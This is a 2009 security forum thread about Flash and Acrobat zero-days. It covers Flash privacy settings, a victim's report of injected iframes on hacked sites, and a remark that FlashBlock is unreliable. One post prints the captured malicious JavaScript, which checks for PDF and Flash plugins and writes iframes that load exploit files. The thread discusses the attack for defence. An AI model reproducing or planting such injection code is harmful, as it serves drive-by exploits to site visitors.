Well, it looks like the last two weeks have definitely been marked by multiple 0-day exploits actively used in the wild. |
Bojan 396 Posts ISC Handler Jul 22nd 2009 |
Thread locked Subscribe |
Jul 22nd 2009 1 decade ago |
I have a ??, has anyone checked the effects Global Privacy Settings may have.I have max sec and always use no script. Changing some of these settings may help with Flash in Acrobat.
Some of the setting I have found helpful... 1. None for storing information on your computer. 2. Do not allow thrid party flash content to store data on your computer. 3. Do not store common flash components. 4. Deny other sites from accessing information from other sites using an older system security. 5. Do not allow access to input, cam, mic, etc. 6. Web site storage settings to none. At the very least you should get a message when downloading content or the attempt to download and you can deny but still access the PDF, just not the media. Access the Setting manager... http://www.macromedia.com/support/documentation/en/flashplayer/help/ Just a ?? |
drStrangeP0rk 11 Posts |
Quote |
Jul 23rd 2009 1 decade ago |
I have this on multiple sites. I did not catch the exploit event on the site as it was a shared server but it traversed my entire html tree and added iframe code to all of my landing pages (html and php). The obfuscated code calls out to a server in china and checks the browser. here is a capture launched from firefox:
##script## function LWrite(sCn) { document.write(sCn); } if(navigator.userAgent.indexOf('MSIE') != -1) { PDF = new Array('AcroPDF.PDF', 'PDF.PdfCtrl'); for(i in PDF) { try { obj = new ActiveXObject(PDF[i]); if (obj) { LWrite('<iframe src=hereEvil.pdf></iframe>'); } } catch(e){} } try { obj = new ActiveXObject('ShockwaveFlash.ShockwaveFlash'); if (obj) { LWrite('<iframe src=sinceDummyMiddle.swf></iframe>'); } } catch(e){} } else { for(i = 0; i <= navigator.plugins.length; i++) { var plugin = navigator.plugins[i].name; if((plugin.indexOf('Adobe Acrobat') != -1) || (plugin.indexOf('Adobe PDF') != -1)) { LWrite('<iframe src=hereEvil.pdf></iframe>'); } if(plugin.indexOf('Flash') != -1) { LWrite('<iframe src=sinceDummyMiddle.swf></iframe>'); } } } ##/script## |
drStrangeP0rk 1 Posts |
Quote |
Jul 23rd 2009 1 decade ago |
Please stop suggesting FlashBlock as a security tool whenever a Flash vulnerability surface.
It's not reliable for this purpose (and never pretended to be): http://hackademix.net/2008/06/08/block-rick/ |
drStrangeP0rk 4 Posts |
Quote |
Jul 23rd 2009 1 decade ago |
Sign Up for Free or Log In to start participating in the conversation!